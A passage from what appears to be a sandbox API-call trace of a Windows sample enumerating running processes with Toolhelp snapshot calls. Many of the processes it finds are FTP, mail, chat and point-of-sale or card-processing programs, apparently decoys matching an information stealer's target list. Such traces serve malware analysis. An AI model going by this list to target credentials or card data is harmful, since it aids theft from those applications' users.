cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0234.272] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0234.274] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0234.275] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0234.278] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0234.281] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0234.283] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0234.286] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0234.288] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0234.295] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0234.297] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0234.300] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0234.302] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0234.304] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0234.308] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0234.311] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0234.314] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0234.316] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0234.318] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0234.320] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0234.322] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0234.325] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0234.327] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0234.329] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0234.333] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0234.336] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0234.338] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0234.340] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0234.342] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0234.345] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0234.347] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0234.349] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0234.351] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0234.353] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0234.355] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0234.357] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0234.359] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0234.361] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0234.363] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0234.365] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0234.367] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0234.372] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0234.374] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0234.376] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0234.379] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0234.381] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0234.384] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0234.386] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0234.391] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0234.392] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0234.394] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0234.396] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0234.398] CloseHandle (hObject=0x2220) returned 1 [0234.398] Sleep (dwMilliseconds=0x64) [0234.503] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2260 [0234.520] Process32First (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.522] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0234.526] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0234.529] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0234.531] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0234.533] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0234.535] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0234.537] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0234.539] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0234.540] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.542] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.547] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0234.549] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.550] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.553] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.555] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.558] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.560] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.562] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.564] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0234.579] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0234.589] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0234.593] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0234.595] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.597] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0234.599] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0234.601] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0234.603] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0234.607] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0234.608] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0234.610] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.612] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0234.614] Process32Next (in: hSnapshot=0x2260, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, 